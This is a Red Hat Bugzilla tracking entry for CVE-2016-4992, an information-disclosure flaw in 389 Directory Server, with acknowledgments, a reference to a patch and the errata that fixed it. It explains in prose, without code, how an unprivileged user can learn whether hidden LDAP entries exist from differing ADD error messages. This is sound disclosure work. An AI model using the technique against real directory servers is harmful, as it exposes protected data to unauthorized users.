Bug 1347760 (CVE-2016-4992) - CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP ADD operation
Summary: CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP AD...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2016-4992
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1347761 1347763 Engineering1350799 Engineering1358559 Engineering1358560 Engineering1358561
Blocks: Embargoed1323912 Embargoed1347766
TreeView+ depends on / blocked
 
Reported: 2016-06-17 14:53 UTC by Adam Mariš
Modified: 2021-02-17 03:42 UTC (History)
8 users (show)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
An information disclosure flaw was found in 389 Directory Server. A user with no access to objects in certain LDAP sub-tree could send LDAP ADD operations with a specific object name. The error message returned to the user was different based on whether the target object existed or not.
Clone Of:
Environment:
Last Closed: 2016-11-15 19:56:53 UTC

Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2016:2594 0 normal SHIPPED_LIVE Moderate: 389-ds-base security, bug fix, and enhancement update 2016-11-03 12:11:08 UTC
Red Hat Product Errata RHSA-2016:2765 0 normal SHIPPED_LIVE Moderate: 389-ds-base security, bug fix, and enhancement update 2016-11-16 00:36:28 UTC

Description Adam Mariš 2016-06-17 14:53:47 UTC 
A vulnerability in 389-ds-base was found that allows to bypass limitations for compare and read operations specified by Access Control Instructions.

When having LDAP sub-tree with some existing objects and having BIND DN which have no privileges over objects inside the sub-tree, unprivileged user can send LDAP ADD operation specifying an object in (supposedly) inaccessible sub-tree. The returned error messages discloses the information when the queried object exists having the specified value. Attacker can use this flaw to guess values of RDN component by repeating the above process.
Comment 1 Adam Mariš 2016-06-17 14:53:58 UTC 
Acknowledgments:

Name: Petr Spacek (Red Hat), Martin Basti (Red Hat)
Comment 2 Adam Mariš 2016-06-17 14:54:25 UTC 
Created 389-ds-base tracking bugs for this issue:

Affects: fedora-all [bug 1347761]
Affects: epel-5 [bug 1347763]
Comment 6 Noriko Hosoi 2016-06-21 00:23:07 UTC 
Created attachment 1170018 [details]
git patch file (master) -- solves ADD case
Comment 13 Petr Spacek 2016-06-21 08:05:03 UTC 
(In reply to Adam Mariš from comment #1)
> Acknowledgments:
> 
> Name: Petr Spacek (Red Hat)

Hi,

please add Martin Basti (Red Hat) to Acknowledgments, he was working on the code with me and we have spotted the problem together.
Comment 14 Adam Mariš 2016-06-21 08:40:57 UTC 
> > Acknowledgments:
> > 
> > Name: Petr Spacek (Red Hat)
> 
> Hi,
> 
> please add Martin Basti (Red Hat) to Acknowledgments, he was working on the
> code with me and we have spotted the problem together.

Done!

---
didn't mean to remove the other needinfo, setting it back
Comment 20 Petr Spacek 2016-07-21 07:31:38 UTC 
The description should be extended to BIND operation as well.
Comment 28 errata-xmlrpc 2016-11-03 20:42:57 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:2594 https://rhn.redhat.com/errata/RHSA-2016-2594.html
Comment 30 errata-xmlrpc 2016-11-15 19:37:24 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2016:2765 https://rhn.redhat.com/errata/RHSA-2016-2765.html
Note You need to log in before you can comment on or make changes to this bug.